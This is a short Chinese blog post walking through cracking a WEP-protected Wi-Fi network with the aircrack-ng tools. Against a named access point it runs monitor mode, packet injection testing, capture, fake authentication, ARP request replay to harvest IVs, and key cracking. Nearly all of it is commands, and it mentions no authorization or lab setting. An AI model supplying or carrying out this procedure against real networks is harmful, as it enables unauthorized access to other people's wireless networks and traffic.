版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396280
1、检查网卡支持
airmon-ng start wlan0 [或wlan1]
airserv-ng -d mon0 #开启监听模式
aireplay-ng -9 127.0.0.1:666 #尝试注入服务器
2、检查信号强度
airodump-ng mon0
来查看范围内的网络列表
收集有效信息:
ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH(通道) - 2
连接到网络的正版用户的Mac地址:
接口:wlan1 - 简称mon0
至少一个用户去连接到网络,产生ARP请求包,我们才能进行攻击。
aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0 #对目标网络测试```
![image.png](http://upload-images.jianshu.io/upload_images/5145235-ebd9c9934f73b828.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0 #捕获数据包```
>伪造身份验证
```aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0```
![认证和捕获数据包](http://upload-images.jianshu.io/upload_images/5145235-4243a569067b0953.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
##ARP请求重播模式
ARP数据包是获取大量IV或数据的最佳选择。没有IVs,你不能hack网络
```aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0 #使aireplay-ng收听AP的ARP数据包,并在找到它们后立即注入。这样会很快创建大量的数据```
##破解网络
```aircrack-ng dump-01.cap```